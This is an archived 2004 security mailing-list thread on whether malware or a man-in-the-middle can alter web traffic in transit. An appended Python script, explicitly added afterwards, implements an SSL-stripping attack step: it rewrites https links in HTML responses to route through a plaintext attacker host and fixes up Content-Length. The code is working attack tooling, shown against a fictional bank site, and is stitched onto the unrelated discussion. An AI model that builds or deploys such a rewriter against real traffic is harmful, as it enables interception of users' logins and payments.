Message-ID: <A65545E6CE47E54BA35EAFE7F2512CCB02AAA997@CDFNEXC1.na.sappi.com>
From: James.Cupps at sappi.com (James.Cupps@...pi.com)
Subject: [inbox] malware added in transit

There is, however, a type of attack sometimes referred to as a ghost attack that is similar to a man-in-the-middle attack and that can do something like this. The way it works is that Eve inserts herself between Bob and Alice using some type of man-in-the-middle attack, then, using certain scripts (the scripts are pretty simple; I have written one in Perl for testing), can selectively alter the content of the data stream between them.

The scary part of this type of attack is that it is even possible to use it to transparently (almost transparently; a really quick user might catch the URL change, but most of them ignore URLs all the time anyway) step into an SSL session before it starts. I think it would be quite difficult to write this type of attack into malware, but probably possible.

The script just alters the HTTP pieces of the HTML traffic to include the SSL (or normal HTTP) site in the middle. You could alter that to include basic HTML exploits pretty easily, but people tend to notice obvious changes to sites, so it would have to be very precise.

The other point to keep in mind is that you have to have some type of MITM (ARP spoof, DNS poison, route redirect, etc.) in place, and if you can do that you probably have a lot of influence over the target anyway. Building this part into malware might not even be possible. I'll have to think about it. But the way this works is similar to what you described in the proxy comment below. I doubt any are currently in existence, but nothing would surprise me.
James Cupps
Information Security Officer
Sappi Fine Paper North America
207-854-7065

-----Original Message-----
From: Curt Purdy [mailto:purdy@...man.com]
Sent: Thursday, March 18, 2004 8:50 AM
To: 'Paul'; full-disclosure@...ts.netsys.com
Subject: RE: [inbox] [Full-Disclosure] malware added in transit

Paul wrote:
> Hi all, perhaps I'm way off-base, but I've been under the impression that malware can be added
> to clean transmissions as they pass through infected nodes. Is this possible?

Unless you're talking about inserting a proxy in-line and manually grabbing the packets and manipulating them at a huge amount of work, you ARE way off-base. There is no malware I know of that would even know what the packets were, much less re-assemble them into the original document, insert itself, and pass it on. Maybe by 2104...

Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA
Information Security Engineer
DP Solutions
----------------------------------------
If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked.
-- White House cybersecurity adviser Richard Clarke

This message may contain information which is private, privileged or confidential and is intended solely for the use of the individual or entity named in the message. If you are not the intended recipient of this message, please notify the sender thereof and destroy / delete the message. Neither the sender nor Sappi Limited (including its subsidiaries and associated companies) shall incur any liability resulting directly or indirectly from accessing any of the attached files which may contain a virus or the like.
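The link-rewriting step James describes (a man in the middle that edits the HTTP pieces of a page so that the SSL site is replaced by a plaintext site in the middle, before the SSL session ever starts), written out in Python as an added example. This is not his Perl script and not part of the original thread; the host names bank.example and mitm.example, the sample HTTP response, and the function names are constructed for illustration. The example also covers one detail the message glosses over: a rewritten body changes size, so the Content-Length header has to be rewritten too or the victim's browser truncates or hangs.

```python
from __future__ import annotations

import re

# https:// URLs carried in href=, src= or action= attributes of the HTML body.
_LINK_RE = re.compile(
    r'(?P<attr>\b(?:href|src|action))=(?P<q>["\'])https://(?P<rest>[^"\']+)(?P=q)',
    re.IGNORECASE,
)


def downgrade_links(html: str, mitm_host: str) -> tuple[str, list[str]]:
    """Rewrite every https:// link so it points at the plaintext MITM host.

    The real host and path are kept in the URL path so the MITM can route the
    request onward and open the real SSL session itself.  Returns the rewritten
    HTML and the list of original https URLs that were touched.
    """
    touched: list[str] = []

    def _sub(m) -> str:
        touched.append("https://" + m.group("rest"))
        # http://mitm.example/bank.example/login is what the victim now sees in
        # the address bar: the "URL change a really quick user might catch".
        return f'{m.group("attr")}={m.group("q")}http://{mitm_host}/{m.group("rest")}{m.group("q")}'

    return _LINK_RE.sub(_sub, html), touched


def upstream_url(request_path: str) -> str:
    """Inverse mapping on the MITM side: the path of an incoming plaintext
    request ("/bank.example/login") names the https URL the victim meant."""
    return "https://" + request_path.lstrip("/")


def rewrite_response(raw: bytes, mitm_host: str) -> bytes:
    """Apply downgrade_links to a complete HTTP/1.x response.

    Responses with no https links pass through byte-for-byte (the selective
    part of the attack).  When the body does change, Content-Length is
    recomputed to match it.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return raw  # not a complete header block; leave the stream alone
    new_body, touched = downgrade_links(body.decode("latin-1"), mitm_host)
    if not touched:
        return raw
    new_body_b = new_body.encode("latin-1")
    out_lines = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            out_lines.append(b"Content-Length: %d" % len(new_body_b))
        else:
            out_lines.append(line)
    return b"\r\n".join(out_lines) + b"\r\n\r\n" + new_body_b


# Constructed sample response from the (fictional) bank.example site.
_SAMPLE_BODY = (
    b'<html><body><a href="https://bank.example/login">Log in</a>'
    b'<form action="https://bank.example/pay"></form></body></html>'
)
_SAMPLE_HEAD = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: %d" % len(_SAMPLE_BODY)
)
SAMPLE_RESPONSE = _SAMPLE_HEAD + b"\r\n\r\n" + _SAMPLE_BODY


if __name__ == "__main__":
    out = rewrite_response(SAMPLE_RESPONSE, "mitm.example")
    print(out.decode("latin-1"))
    print(upstream_url("/bank.example/login"))
```

Run stand-alone it prints the rewritten response: both links now carry http://mitm.example/bank.example/..., the header advertises the new body length, and the victim's browser never initiates SSL to bank.example; the middle host does that on its behalf. The same attribute-level rewriting is what later tooling for this attack class (SSL stripping) automated against live traffic, and the visible tell is still the one the message names: the scheme and host in the address bar are not the ones the user expected.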